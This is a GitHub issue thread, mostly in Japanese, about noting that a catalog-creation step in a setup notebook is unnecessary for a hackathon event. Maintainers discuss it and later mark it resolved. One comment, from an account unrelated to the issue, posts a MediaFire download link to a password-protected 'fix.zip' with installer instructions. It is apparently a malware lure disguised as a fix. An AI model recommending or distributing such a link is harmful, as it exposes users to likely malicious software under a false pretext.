### ISSUE TITLE
content/00_setup.py にてカタログを作成する手順となっているがイベントでは不要の旨を注記するか検討

### ISSUE THREAD

**Issue by manabian-** [skotani-db/openhack2024#18]
content/00_setup.py にてカタログを作成する手順となっているがイベントでは不要の旨を注記するか検討したほうがよさそうです。

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by manabian-** [comment]
対応済み
